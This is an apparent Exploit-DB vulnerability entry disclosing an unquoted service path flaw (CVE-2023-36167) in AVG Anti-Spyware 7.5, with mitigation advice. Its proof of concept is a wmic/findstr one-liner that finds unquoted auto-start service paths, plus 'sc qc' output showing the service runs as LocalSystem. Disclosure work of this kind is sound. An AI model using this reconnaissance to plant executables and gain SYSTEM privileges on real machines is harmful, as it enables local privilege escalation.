AVG Anti Spyware 7.5 - Unquoted Service Path

vendor:

AVG Anti-Spyware

by:

Idan Malihi

6.8

CVSS

MEDIUM

Unquoted Service Path

428

CWE

Product Name: AVG Anti-Spyware

Affected Version From: 7.5

Affected Version To: 7.5

Patch Exists: NO

Related CWE: CVE-2023-36167

CPE: a:avg:anti_spyware:7.5

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

AVG Anti Spyware 7.5 – Unquoted Service Path

The AVG Anti-Spyware 7.5 software on Windows 10 Pro has an unquoted service path vulnerability, which allows local users to gain privileges via a crafted executable file in the %SYSTEMDRIVE% folder.

Mitigation:

To mitigate this vulnerability, the vendor should update the software to include the correct quoting of the service path. Users should also ensure that their systems have the latest security updates installed.

Source

Exploit-DB raw data:

# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.avg.com
# Software Link: https://www.avg.com/en-ww/homepage#pc
# Version: 7.5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36167

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
AVG Anti-Spyware Guard                                                              AVG Anti-Spyware Guard                    C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe                            Auto

C:\Users>sc qc "AVG Anti-Spyware Guard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AVG Anti-Spyware Guard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AVG Anti-Spyware Guard
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation